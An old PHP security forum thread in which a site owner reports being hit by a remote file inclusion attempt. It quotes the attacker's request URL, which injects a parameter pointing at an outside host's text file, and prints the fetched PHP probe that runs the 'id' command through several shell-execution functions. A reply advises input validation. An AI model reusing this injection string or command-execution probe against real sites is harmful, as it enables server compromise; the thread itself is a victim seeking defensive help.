Being Hacked

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
lupole
Forum Newbie
Posts: 1
Joined: Sun Jul 12, 2009 10:50 am

Being Hacked

Post by lupole »

Hello all.

I Got hacked last night from Korea Republic ip 210.205.57.2. Browser: libwww-perl/5.79
This was a Bookmark entry and the landing page was:

myhomepage.com/catalog/my-lovemp3-sampledownload-p-172.html?language=de///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt???

Landing page should be this:

myhomepage.com/catalog/my-lovemp3-sampledownload-p-172.html?language=de

without the following:

///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt???

When I point my browser to:

samjinenginc.com/board/readme.txt???

the below script shows. After this, the next stats entry does not show only this error blocking the ip and country addresses:

Warning: gethostbyaddr() [function.gethostbyaddr]: Address is not in a.b.c.d form in /www/myhomepage.com/web/catalog/admin/supertracker.php on line 549

After this entry, all other enties are normal.

Not sure as to the total function of this script, but it appears to be blocking me from getting certain ip addresses, and country information. Is there a way to block this script?

This also blocked my other tracking scripts.

1. | <?php
2. | echo "Mic22";
3. | $cmd="id";
4. | $eseguicmd=ex($cmd);
5. | echo $eseguicmd;
6. | function ex($cfe){
7. | $res = '';
8. | if (!empty($cfe)){
9. | if(function_exists('exec')){
10. | @exec($cfe,$res);
11. | $res = join("\n",$res);
12. | }
13. | elseif(function_exists('shell_exec')){
14. | $res = @shell_exec($cfe);
15. | }
16. | elseif(function_exists('system')){
17. | @ob_start();
18. | @system($cfe);
19. | $res = @ob_get_contents();
20. | @ob_end_clean();
21. | }
22. | elseif(function_exists('passthru')){
23. | @ob_start();
24. | @passthru($cfe);
25. | $res = @ob_get_contents();
26. | @ob_end_clean();
27. | }
28. | elseif(@is_resource($f = @popen($cfe,"r"))){
29. | $res = "";
30. | while(!@feof($f)) { $res .= @fread($f,1024); }
31. | @pclose($f);
32. | }}
33. | return $res;
34. | }
35. | exit;

Thanks
matthijs
DevNet Master
Posts: 3360
Joined: Thu Oct 06, 2005 3:57 pm

Re: Being Hacked

Post by matthijs »

In your script, how is

Code: Select all

?language=de
being used?

If you validate and filter that input well (as you should do with all input), it should not be possible to inject any code.
Post Reply